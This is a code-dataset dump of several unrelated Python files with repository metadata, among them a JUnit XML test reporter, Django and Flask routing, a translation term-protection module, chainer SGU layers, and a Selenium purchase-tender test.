children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "STATUS_CODE_NAME" in test_dic_for_case:
m = STATUS_CODE_NAME(response)
children = SubElement(parent, 'testcase', name=str(m))
if "False" in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "RESPONSE_TIME" in test_dic_for_case:
m = RESPONSE_TIME(response)
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "CONTENT_TYPE_IS_PRESENT" in test_dic_for_case:
m = CONTENT_TYPE_IS_PRESENT(response)
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
if "RESPONSE_HAS_ACCKEY" in test_dic_for_case:
dict_response = response.__dict__["_content"]
r = json.loads(dict_response)
m = RESPONSE_HAS_ACCKEY(r)
# print m
children = SubElement(parent, 'testcase', name=str(m))
if 'False' in m:
children_1 = SubElement(children, 'failure', type="AssertionFailure")
children_2 = SubElement(children_1, 'failed')
children_2.text = "![CDATA[Failed]]"
children_1.extend(children_2)
else:
parent.extend(children)
|
[
"evmon@ex.ua"
] |
evmon@ex.ua
|
f06e6cd20ffd0594a254af576292149542c248bf
|
7d57247e1cefc7dfdd4c12a745366fae5e413a11
|
/tests/conftest.py
|
9731d89f424cc00aa2b48745e73b0a2e2a1149b7
|
[
"BSD-2-Clause"
] |
permissive
|
chintal/sphinxcontrib-collations
|
6920314dddba4eea7b059028a9cb2c7dba9e3121
|
dd2b7f449bf025695fb25a4c685fd3ab9b1c6c53
|
refs/heads/master
| 2020-06-21T09:12:09.492796
| 2019-07-17T13:14:03
| 2019-07-17T14:22:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 293
|
py
|
"""
pytest config for sphinxcontrib/collations/tests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: Copyright 2017 by Chintalagiri Shashank <shashank.chintalagiri@gmail.com>
:license: BSD, see LICENSE for details.
"""
pytest_plugins = 'sphinx.testing.fixtures'
|
[
"shashank.chintalagiri@gmail.com"
] |
shashank.chintalagiri@gmail.com
|
550abb7570d8b8943d140a815dfcc92c727bbc0b
|
fbb1494be3ff7b6a5dfa3b9204cc927af4103b59
|
/api/urls.py
|
242b792a393d67ac9d39ff798fc079072c76b9ff
|
[] |
no_license
|
james-work-account/raml_loader_api
|
a3380faf6f07ae82b1b113e7019fbb5f6840df31
|
4483b13de5d74c20f7c3696ba6180332b36fdc2b
|
refs/heads/master
| 2021-07-24T07:32:28.507993
| 2020-10-06T08:38:23
| 2020-10-06T08:38:23
| 222,752,033
| 0
| 0
| null | 2020-10-06T08:25:55
| 2019-11-19T17:29:11
|
Python
|
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""api URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('raml/', include('raml_parser.urls')),
path('admin/', admin.site.urls),
]
|
[
"31282758+james-work-account@users.noreply.github.com"
] |
31282758+james-work-account@users.noreply.github.com
|
db5c965f2a0a9a8eca0e23b6beaa853f2fa82cff
|
14d7dbf445a5fde2a6611c41cd55bc17978afec4
|
/flask_app/application.py
|
bfdd92df2989f1ed4b3c63654868c835612a6b6b
|
[] |
no_license
|
Happollyon/Class2
|
a7ef72caefebf5e23209b06ecf84560d3b73394f
|
8136fd0c70cf1cc4e82361d5a2ca54c282e5066c
|
refs/heads/master
| 2022-09-17T07:14:09.356631
| 2020-05-28T14:23:37
| 2020-05-28T14:23:37
| 257,603,308
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
from flask import Flask, render_template,request, session
#from flask_session import Session
app=Flask(__name__)
@app.route('/')
def index():
return "Hello world"
@app.route('/fagner')
def fagner():
return"hello fagner"
@app.route("/<string:name>") # you can set a rout name
def hello(name):
return f"hello, {name}"
#templates look at netes and conditions inside ginger
#extend templates
|
[
"36013973+Happollyon@users.noreply.github.com"
] |
36013973+Happollyon@users.noreply.github.com
|
0da9380cc1898690b9c39d5b4b7ff4392ed376b1
|
753a03d58940847b76203e39b8cb60d775bc8370
|
/test/test_systems_generators_dockerignore.py
|
d95c632c27a1cd1a45a647dd3008e979abe95f4c
|
[
"MIT"
] |
permissive
|
SanthoshBala18/skelebot
|
912d84abef113f86eeb6b05f50ae9c2bd6115d45
|
13055dba1399b56a76a392699aa0aa259ca916a9
|
refs/heads/master
| 2020-08-03T15:24:11.105137
| 2019-09-27T15:12:25
| 2019-09-27T15:12:25
| 211,799,653
| 0
| 0
|
MIT
| 2019-09-30T07:19:27
| 2019-09-30T07:19:27
| null |
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
from unittest import TestCase
from unittest import mock
import skelebot as sb
import os
class TestDockerignore(TestCase):
path = ""
config = None
# Get the path to the current working directory before we mock the function to do so
def setUp(self):
self.path = os.getcwd()
@mock.patch('os.path.expanduser')
@mock.patch('os.getcwd')
def test_buildDockerignore(self, mock_getcwd, mock_expanduser):
folderPath = "{path}/test/files".format(path=self.path)
filePath = "{folder}/.dockerignore".format(folder=folderPath)
mock_expanduser.return_value = "{path}/test/plugins".format(path=self.path)
mock_getcwd.return_value = folderPath
self.config = sb.systems.generators.yaml.loadConfig()
expected= """
# This dockerignore was generated by Skelebot
# Editing this file manually is not advised as all changes will be overwritten by Skelebot
**/*.zip
**/*.RData
**/*.pkl
**/*.csv
**/*.model
**/*.pyc
"""
sb.systems.generators.dockerignore.buildDockerignore(self.config)
data = None
with open(filePath, "r") as file:
data = file.read()
self.assertTrue(data is not None)
self.assertEqual(data, expected)
if __name__ == '__main__':
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
7ca71e74e605112ef507f107584f872545a68564
|
499efac953f9f0ed3ef1876b3a470250c75f7ac1
|
/mnist_sklearn.py
|
7f778519c5dc8279f17a25ce634530272f3881e0
|
[] |
no_license
|
ravi911sharma44/MNIST-
|
b7ffe5c2b9492e7997590a618c8a483f72709e95
|
15fb747ce7e928f963d4bd61d28a5411e98878c8
|
refs/heads/main
| 2023-07-17T03:04:02.138426
| 2021-08-14T15:31:24
| 2021-08-14T15:31:24
| 396,047,993
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 538
|
py
|
import pandas as pd
df = pd.read_csv (r'E:\chat bot intern\week 3\mnist_train.csv\mnist_train.csv')
df = pd.DataFrame(df)
from sklearn.model_selection import train_test_split
X = df.drop('label', axis = 1)
Y = df.label
x_train, x_test, y_train, y_test = train_test_split(X, Y, test_size = 0.2)
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error
model = LinearRegression()
model.fit(x_train, y_train)
pred = model.predict(x_test)
print(mean_squared_error(y_test, pred))
|
[
"noreply@github.com"
] |
noreply@github.com
|
d7d2b1821665e6ce2fba837251c3f8cc1a3c770e
|
fff4663f296e081d4aa3ca4b36c301afb95aee88
|
/lib_translate/term_protection.py
|
b5dab0be375d36ef3d46bc9c0450aa52067b961f
|
[] |
no_license
|
sammichenVV/translateserver-py
|
84d7787c0b4e42542be433b909ed243f65e4ed38
|
b4c6900281b2219097d6f1f86a71311180a60c1e
|
refs/heads/main
| 2023-03-19T14:20:00.579830
| 2021-03-17T06:54:01
| 2021-03-17T06:54:01
| 348,186,221
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,773
|
py
|
"""
对输入文本的专业术语进行保护,目前仅支持一句话中对一个术语进行保护
>>> src_word, tgt_word = "Hello world", "你好世界"
>>> add_words([[src_word, tgt_word]])
>>> src_word.lower() in show_words(return_dict=True)
True
>>> add_words([["I'm", "我是"]])
>>> sent, term = mask_term("hello world! I'm.")
>>> de_mask_term(sent, term)
'你好世界! 我是.'
>>> delete_words(["I'm", "hello world"])
>>> src_word.lower() not in show_words(return_dict=True)
True
>>> mask_term("hello world! I'm.")
("hello world! I'm.", [])
"""
import re
import warnings
import pandas
from sqlalchemy import Column, String, create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from config import global_config
PROTECTION_SYMBOL = global_config["term_mask_symbol"]
DICT_FILE = global_config.get("term_protection_dict", None)
SRC_LANG = global_config["translate_src_lang"]
TGT_LANG = global_config["translate_tgt_lang"]
TERM_PROTECTION_DB = global_config["term_protection_db"]
__all__ = ["mask_term", "de_mask_term",
"add_words", "delete_words", "show_words"]
def _transform_word(word):
"""
对加入词表的词进行预处理
"""
return word.strip().lower()
class DFAFilter():
"""
使用dfa算法构建的term filter
>>> keywords = ["hello world", "I'm", "hello"]
>>> dfa_filter = DFAFilter(keywords)
>>> terms, indexes = dfa_filter.filter("Hello world. I'm fine thank you.")
>>> terms
['Hello world', "I'm"]
>>> indexes
[(0, 11), (13, 16)]
"""
def __init__(self, keywords):
self.keyword_chains = {}
self.delimit = '\x00'
self.keywords = keywords
for word in keywords:
if isinstance(word, str):
self.add(word.strip())
def remove(self, keyword):
"""
移除过滤器中的词
"""
if not keyword:
return
chars = _transform_word(keyword)
level = self.keyword_chains
prev_level = None
prev_key = None
for char in chars:
if char not in level:
return
if self.delimit in level:
prev_level = level
prev_key = char
level = level[char]
if len(level) > 1:
level.pop(self.delimit)
else:
prev_level.pop(prev_key)
def add(self, keyword):
"""
向过滤器中添加词表
"""
chars = _transform_word(keyword)
if not chars:
return
level = self.keyword_chains
for i in range(0, len(chars)):
if chars[i] in level:
level = level[chars[i]]
else:
for j in range(i, len(chars)):
level[chars[j]] = {}
last_level, last_char = level, chars[j]
level = level[chars[j]]
last_level[last_char] = {self.delimit: 0}
break
if i == len(chars) - 1:
level[self.delimit] = 0
def filter(self, message):
"""
从文本中找出词表中的词
"""
origin_message = message
message = _transform_word(message)
sensitive_words = []
indexes = []
start = 0
while start < len(message):
level = self.keyword_chains
step_ins = 0
word_start, word_end = -1, -1
for char in message[start:]:
if char in level:
step_ins += 1
if self.delimit in level[char]:
word_start, word_end = start, start + step_ins
level = level[char]
else:
break
if word_end >= 0:
sensitive_words.append(origin_message[word_start: word_end])
indexes.append((word_start, word_end))
start = word_end - 1
start += 1
return sensitive_words, indexes
Base = declarative_base()
class Vocab(Base):
__tablename__ = "{}-{}".format(SRC_LANG, TGT_LANG)
src_word = Column(String(64), primary_key=True)
tgt_word = Column(String(64))
ENGIN = create_engine("sqlite:///{}".format(TERM_PROTECTION_DB))
SESSION = sessionmaker(bind=ENGIN)()
Base.metadata.create_all(ENGIN)
def read_dict_sqlite():
"""
从sqlite数据库中读取需要保护的词典
"""
mapping = {}
for item in SESSION.query(Vocab):
mapping[_transform_word(item.src_word)] = item.tgt_word
return mapping
def read_dict_excel(term_file):
"""
从原文和译文中获取需要保护的词典。
格式规定:词典的第一行为列名,分别有源语言和目标语言的简称,中文:zh 英文:en
后面每一行是对应语言需要保护的term
"""
dataframe = pandas.read_excel(term_file)
langs = dataframe.columns.tolist()
mapping = {}
reverse_mapping = {}
for _, (src, tgt) in dataframe.iterrows():
if isinstance(src, str) and isinstance(tgt, str):
mapping[_transform_word(src)] = tgt
reverse_mapping[_transform_word(tgt)] = src
vocab = {
"{}-{}".format(*langs): mapping,
"{}-{}".format(*reversed(langs)): reverse_mapping
}
return vocab.get("{}-{}".format(SRC_LANG, TGT_LANG))
if DICT_FILE:
try:
MAPPING = read_dict_excel(DICT_FILE)
except FileNotFoundError:
MAPPING = {}
else:
MAPPING = {}
if not MAPPING:
warnings.warn(
"Can't find mapping {}-{} from dict file for term protecting.".format(SRC_LANG, TGT_LANG))
MAPPING.update(read_dict_sqlite())
TERM_FILTER = DFAFilter(list(MAPPING.keys()))
def mask_term(sent):
"""
给定一段平行语料,对其中的term进行保护操作
"""
terms, indexes = TERM_FILTER.filter(sent)
if PROTECTION_SYMBOL in sent:
return sent, ""
string_builder = ""
prev = 0 # 记录上一个term的位置
for i, (start, end) in enumerate(indexes):
string_builder += sent[prev:start]
string_builder += PROTECTION_SYMBOL + str(i)
prev = end
string_builder += sent[prev:]
return string_builder, terms
RE_DEMULTY = re.compile(
"([{} ]+)([0-9]+)".format("".join(set(PROTECTION_SYMBOL))))
def de_mask_term(sent, terms):
"""
对句子进行去保护
"""
string_builder = ""
prev = 0 # 记录上一个term的位置
for obj in RE_DEMULTY.finditer(sent):
start, end = obj.span()
string_builder += sent[prev:start]
prev = end
prefix, num = obj.groups()
if not prefix.replace(" ", ""):
# 如果提取的前缀中只有空格,则跳过
continue
num = int(num)
if num >= len(terms):
continue
term = terms[num]
string_builder += MAPPING[_transform_word(term)]
string_builder += sent[prev:]
return string_builder
def add_words(words):
"""添加词典"""
for src_word, tgt_word in words:
SESSION.merge(Vocab(src_word=src_word, tgt_word=tgt_word))
MAPPING[_transform_word(src_word)] = tgt_word
TERM_FILTER.add(src_word)
SESSION.commit()
def delete_words(words):
"""
从词典中删除
"""
for word in words:
MAPPING.pop(_transform_word(word), None)
TERM_FILTER.remove(word)
SESSION.query(Vocab).filter(Vocab.src_word == word).delete()
SESSION.commit()
def show_words(return_dict=False):
"""
返回当前词典中的全部数据
"""
if return_dict:
return MAPPING
else:
return [[key, value] for key, value in MAPPING.items()]
|
[
"00025@yu.lan-bridge.com"
] |
00025@yu.lan-bridge.com
|
392d504d2b4be2f95ee073ec8a8beccce1d6bd49
|
d1a111119ec7aed797d1487b9a5740217d43effc
|
/students/templatetags/tags.py
|
28e1e2ea85fd52a4ce90660cb5ee127a9c1a29cf
|
[] |
no_license
|
shurique/student_task
|
3f693f20691971f9e7fee03e8cc4cffd130aa53b
|
2cf873adbc8657ac31e6efc4c12805c0387a67d7
|
refs/heads/master
| 2021-01-10T22:20:51.941404
| 2012-02-03T08:31:30
| 2012-02-03T08:31:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 851
|
py
|
#-*-coding: utf-8 -*-
from django import template
from django.core import urlresolvers
from django.contrib.contenttypes.models import ContentType
register = template.Library()
class EditListNode(template.Node):
def __init__(self, value):
self.var = template.Variable(value)
def render(self, context):
var = self.var.resolve(context)
ctype = ContentType.objects.get_for_model(type(var))
link = u'admin:%s_%s_change' % (ctype.app_label, ctype.model)
return urlresolvers.reverse(link, args=(var.id,))
@register.tag
def edit_list(parser, token):
try:
tag_name, value = token.split_contents()
except ValueError:
msg = u'Тег %r требует один аргумент' % token.split_contents()[0]
raise template.TemplateSyntaxError(msg)
return EditListNode(value)
|
[
"godetskiy@ya.ru"
] |
godetskiy@ya.ru
|
ce2ce7dc2c0f952870f86143e1a519cfa7a22b93
|
2825a2d056db418a3bf04d8d2ffc7133cd552d0f
|
/jsondiff/mountpoint.py
|
b2b2f60d5cdfca5d072f5297f75289d5d311cb15
|
[] |
no_license
|
trendsnet/jsondiff
|
eabba41a2c9111d2a2aefdb460564fcc7f1743b8
|
dce2af96542cb986dd1bd927972faf8c505364d9
|
refs/heads/master
| 2020-05-30T04:57:37.713001
| 2017-05-08T07:41:22
| 2017-05-08T07:41:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
#coding:utf-8
__author__ = 'Feng Lu'
from .views.diff import diff
MOUNT_POINTS = ((diff, "/diff"),
(diff, "/"),
)
|
[
"liyanjie8@wanda.cn"
] |
liyanjie8@wanda.cn
|
b768abfeda8056001f6bd64fe0e1e40d66c85e89
|
c7bb49430a2651955e545c3ae4907e870a7f2568
|
/patterns/Observer/observer.py
|
504ceae4e97e41bceceda740bb0b9bffbce54681
|
[] |
no_license
|
jvrcavalcanti/Algorithms
|
133dd29d985c41560b212ed1b204d8220bd89bc9
|
d83f8e61d959e9da970d6270b373eaea39701927
|
refs/heads/master
| 2020-12-31T22:34:25.696750
| 2020-06-16T18:25:58
| 2020-06-16T18:25:58
| 239,056,779
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 116
|
py
|
from abc import ABC, abstractmethod
class Observer():
@abstractmethod
def handle(self, state):
pass
|
[
"jonnyvictor01@gmail.com"
] |
jonnyvictor01@gmail.com
|
2b6516b8357caff161af954e665fc30dd6a1ad1e
|
8bb6e8535c12c541866ad87fbd221750c7dac127
|
/lib/kb_irep/kb_irepImpl.py
|
0794129841b97942c4a676c5bd19fb284a692a7c
|
[
"MIT"
] |
permissive
|
jungbluth/kb_irep
|
1a0caa793133ec587a0cf8b8de4154c2bb5c82aa
|
55c8f2bfb3ccba74d3418dec31acf6d9630b1ac5
|
refs/heads/master
| 2021-07-18T06:00:00.508236
| 2020-12-30T20:26:15
| 2020-12-30T20:26:15
| 227,967,740
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,768
|
py
|
# -*- coding: utf-8 -*-
#BEGIN_HEADER
import logging
import os
from installed_clients.KBaseReportClient import KBaseReport
#END_HEADER
class kb_irep:
'''
Module Name:
kb_irep
Module Description:
A KBase module: kb_irep
'''
######## WARNING FOR GEVENT USERS ####### noqa
# Since asynchronous IO can lead to methods - even the same method -
# interrupting each other, you must be *very* careful when using global
# state. A method could easily clobber the state set by another while
# the latter method is running.
######################################### noqa
VERSION = "0.0.1"
GIT_URL = "https://github.com/jungbluth/kb_irep"
GIT_COMMIT_HASH = "27849324019fb7eeabff2796e9e33115d976f459"
#BEGIN_CLASS_HEADER
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
self.callback_url = os.environ['SDK_CALLBACK_URL']
self.shared_folder = config['scratch']
logging.basicConfig(format='%(created)s %(levelname)s: %(message)s',
level=logging.INFO)
#END_CONSTRUCTOR
pass
def run_kb_irep(self, ctx, params):
"""
This example function accepts any number of parameters and returns results in a KBaseReport
:param params: instance of mapping from String to unspecified object
:returns: instance of type "ReportResults" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_kb_irep
report = KBaseReport(self.callback_url)
report_info = report.create({'report': {'objects_created':[],
'text_message': params['parameter_1']},
'workspace_name': params['workspace_name']})
output = {
'report_name': report_info['name'],
'report_ref': report_info['ref'],
}
#END run_kb_irep
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_kb_irep return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
|
[
"jungbluth.sean@gmail.com"
] |
jungbluth.sean@gmail.com
|
5d911f4022457d7e47942adf723047dc59cefa2f
|
4a5f3b26fca176a80ca8eca796bc646bb225b017
|
/attentive-reader-2/sgu.py
|
8ddc21a3a0732b54672764fcd0003dcc2dec4e7a
|
[] |
no_license
|
musyoku/NLP
|
9a63dc882b07b017f7cfc72d863c4d9e5cbeff5e
|
9b040bb960b65fb2a1c330adafa6c52e3284a0c1
|
refs/heads/master
| 2021-01-21T04:53:57.029200
| 2016-07-10T17:08:03
| 2016-07-10T17:08:03
| 55,848,677
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,107
|
py
|
import numpy
import chainer
from chainer import cuda
from chainer.functions.activation import sigmoid
from chainer.functions.activation import softplus
from chainer.functions.activation import tanh
from chainer.functions.math import clip
from chainer import link
from chainer.links.connection import linear
from chainer import variable
def hard_sigmoid(x):
return clip.clip(x * 0.2 + 0.5, 0.0, 1.0)
class SGU(link.Chain):
def __init__(self, in_size, out_size):
super(SGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = softplus.softplus(z_g * h)
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulSGU(SGU):
def __init__(self, in_size, out_size):
super(StatefulSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
xp = cuda.get_array_module(x)
zero = variable.Variable(xp.zeros_like(x.data))
z_out = softplus.softplus(zero)
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * z_out
else:
h_t = SGU.__call__(self, self.h, x)
self.h = h_t
return h_t
class DSGU(link.Chain):
def __init__(self, in_size, out_size):
super(DSGU, self).__init__(
W_xh=linear.Linear(in_size, out_size),
W_zxh=linear.Linear(out_size, out_size),
W_go=linear.Linear(out_size, out_size),
W_xz=linear.Linear(in_size, out_size),
W_hz=linear.Linear(out_size, out_size),
)
def __call__(self, h, x):
x_g = self.W_xh(x)
z_g = tanh.tanh(self.W_zxh(x_g * h))
z_out = sigmoid.sigmoid(self.W_go(z_g * h))
z_t = hard_sigmoid(self.W_xz(x) + self.W_hz(h))
h_t = (1 - z_t) * h + z_t * z_out
return h_t
class StatefulDSGU(DSGU):
def __init__(self, in_size, out_size):
super(StatefulDSGU, self).__init__(in_size, out_size)
self.state_size = out_size
self.reset_state()
def to_cpu(self):
super(StatefulDSGU, self).to_cpu()
if self.h is not None:
self.h.to_cpu()
def to_gpu(self, device=None):
super(StatefulDSGU, self).to_gpu(device)
if self.h is not None:
self.h.to_gpu(device)
def set_state(self, h):
assert isinstance(h, chainer.Variable)
h_ = h
if self.xp == numpy:
h_.to_cpu()
else:
h_.to_gpu()
self.h = h_
def reset_state(self):
self.h = None
def __call__(self, x):
if self.h is None:
z_t = hard_sigmoid(self.W_xz(x))
h_t = z_t * 0.5
else:
h_t = DSGU.__call__(self, self.h, x)
self.h = h_t
return h_t
|
[
"musyoku@users.noreply.github.com"
] |
musyoku@users.noreply.github.com
|
90ab9fd8dbaf028130901ea8dc146e64dc36e060
|
8270ee8435d2c95dcc9f0e8f9f2119a45cafdf34
|
/authentication/authentication/urls.py
|
62d83125245dc2239a6a24bc1a945d75afe0e38f
|
[] |
no_license
|
venkatapriya2020/Django_Hands_On
|
d8fa20124181f8ed59aaea91f2c3ebfec45495b6
|
28bd9d6fd95730c8f85c40c0d284d2d7cb3fe462
|
refs/heads/master
| 2023-02-04T05:19:42.708484
| 2020-12-20T22:32:28
| 2020-12-20T22:32:28
| 323,177,354
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 802
|
py
|
"""authentication URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path , include
urlpatterns = [
path("",include("users.urls")),
path('admin/', admin.site.urls),
]
|
[
"venkatapriya@live.com"
] |
venkatapriya@live.com
|
e41f7a4ee3dff131d8b4f169176cf7ead839fc16
|
8af82d8482761aa99f6db95527a20c8854c00fdb
|
/PT_Approve.py
|
e951714fc9aff612626a16950f2f94ad0101e9a3
|
[] |
no_license
|
vandy1992/SCM-Automation
|
62c02f665dcf42e79459f7aec575f07e35720c81
|
38c4266b943ece80df66ea32ba22f774a46df6c6
|
refs/heads/master
| 2022-11-20T13:15:56.572776
| 2020-07-10T09:05:47
| 2020-07-10T09:05:47
| 278,587,474
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,805
|
py
|
import unittest
# import HtmlTestRunner
import time
import allure
from allure_commons.types import AttachmentType
from selenium import webdriver
import sys
sys.path.append("C://Users/Vandana Mallaiah/PycharmProjects/loginpage") #run through cmd and to generate report we need this or else no need
from pages.purchase_tender_page import Purchase_Tender
#https://clever-brahmagupta-0d6b23.netlify.app
class purchase_tender_Test(unittest.TestCase):
baseURL="https://testscm.digicollect.com/"
email ="manager@testdigibar.com"
password ="testdigibar123"
# driver = webdriver.Firefox(executable_path="E:\geckodriver-v0.26.0-win64\geckodriver.exe")
driver = webdriver.Chrome(executable_path="E:\chromedriver_win32\chromedriver.exe")
prno="DIGICOLLECT1234"
Bran="Test Digibar"
trno="vandy@@K654"
@classmethod
def setUpClass(cls):
cls.driver.get(cls.baseURL)
cls.driver.maximize_window()
def test_Purchase_tender(self):
pt=Purchase_Tender(self.driver)
time.sleep(3)
allure.attach(self.driver.get_screenshot_as_png(), name="loginpage", attachment_type=AttachmentType.PNG)
pt.login_page("manager@testdigibar.com","testdigibar123")
time.sleep(5)
allure.attach(self.driver.get_screenshot_as_png(), name="homepage", attachment_type=AttachmentType.PNG)
pt.click_create_new()
time.sleep(3)
pt.click_foreign()
time.sleep(3)
pt.click_tr_no(self.trno)
pt.click_pr_no()
pt.click_branch()
pt.click_dept()
pt.click_Attention()
pt.click_date()
pt.click_currency()
pt.click_authorised()
pt.click_phone()
# pt.click_address()
# pt.click_Save()
pt.click_same_as_billing()
pt.click_product()
pt.other_info()
# pt.file_attach()
pt.click_saveandsend()
allure.attach(self.driver.get_screenshot_as_png(), name="sendapproval", attachment_type=AttachmentType.PNG)
pt.approval()
pt.click_send()
pt.click_approve()
pt.enter_note()
pt.click_yes()
pt.click_List()
allure.attach(self.driver.get_screenshot_as_png(), name="listview", attachment_type=AttachmentType.PNG)
pt.click_single()
# pt.click_approved()
pt.click_view_attach()
allure.attach(self.driver.get_screenshot_as_png(), name="viewattach", attachment_type=AttachmentType.PNG)
pt.click_close()
pt.click_single()
pt.click_list_delete()
allure.attach(self.driver.get_screenshot_as_png(), name="delete", attachment_type=AttachmentType.PNG)
#
if __name__=='__main__':
unittest.main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
bdf356f1b24561547e82750dcf298ac1a820f9f4
|
f53ebcc05ccc8892c32fc2b5c121ba0d78451adb
|
/classify_images.py
|
a0f79e4a9fbf09917707b7f53e0b97d22a0ea8eb
|
[] |
no_license
|
XDUNZC/TBtianchi_submit
|
4a45e1096fa389ea9123647e7caaa7cb52a9c322
|
e6b1497c0063379f34f9e8cab4926fb160944fdd
|
refs/heads/master
| 2023-08-15T19:45:07.112471
| 2020-04-12T06:56:57
| 2020-04-12T06:56:57
| 249,676,498
| 0
| 0
| null | 2023-07-23T09:42:19
| 2020-03-24T10:20:56
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 4,010
|
py
|
from read_dataset import Reader
from save import Saver
from model.Resnet50.run import Worker as MatchWorker
from model.mmdetection_coco import run as DetectionWorker
import utils
import os
import mmcv
import random
class Classifier():
def __init__(self,classify_model,reader):
self.classify_model = classify_model
self.reader = reader
self.class2commoditys = {i:set() for i in range(23)}
self.img_boxes_label_result = {}
self._classify_image()
def _classify_image(self):
print('开始检测所有商品图,并进行分类剪枝:')
# 为了加速debug 只剪枝前1000个商品图
for commodity in mmcv.track_iter_progress(self.reader.commodity_index_list):
labels_in_this_commodity = {i:0 for i in range(23)}
imgs_in_this_commodity = list(self.reader.commodity_index2img_path_list[commodity])
for img in imgs_in_this_commodity:
result_over_thr, labels_over_thr, _ = DetectionWorker.get_result_and_feats(self.classify_model, img)
self.img_boxes_label_result[img] = (result_over_thr, labels_over_thr)
for label in labels_over_thr:
labels_in_this_commodity[label]+=1
labels_in_this_commodity_list = sorted(labels_in_this_commodity.items(), key=lambda x: x[1], reverse=True)[:2] # 取出现类标最多的两个
for i,item in enumerate(labels_in_this_commodity_list):
label, appear_num = item
if i!=0 and appear_num==0:
break
self.class2commoditys[label].add(commodity) # 将商品加入到所属类标下
# 选出具有代表性的图 剪枝商品图
present_imgs = []
random.shuffle(imgs_in_this_commodity)
for img in imgs_in_this_commodity:
result_over_thr, labels_over_thr = self.img_boxes_label_result[img]
if [x for x in labels_in_this_commodity_list if x in labels_over_thr] != []:
present_imgs.append(img)
if len(present_imgs) == 2 : # 控制选择几幅图
break
self.reader.commodity_index2img_path_list[commodity] = present_imgs
def show_classify_result(self):
for label,commoditys in self.class2commoditys.items():
print('lable: ',label,' commoditys: ',commoditys)
def main():
# 初始化文件路径获得类
reader = Reader(test_dataset_path='tcdata/',
img_path='tcdata/test_dataset_3w/image/',
video_path='tcdata/test_dataset_3w/video/')
print("success init reader")
# 初始化结果保存类
saver = Saver()
print("success init saver")
# 执行匹配工作
"""初始化匹配模型"""
# TODO 替换参数
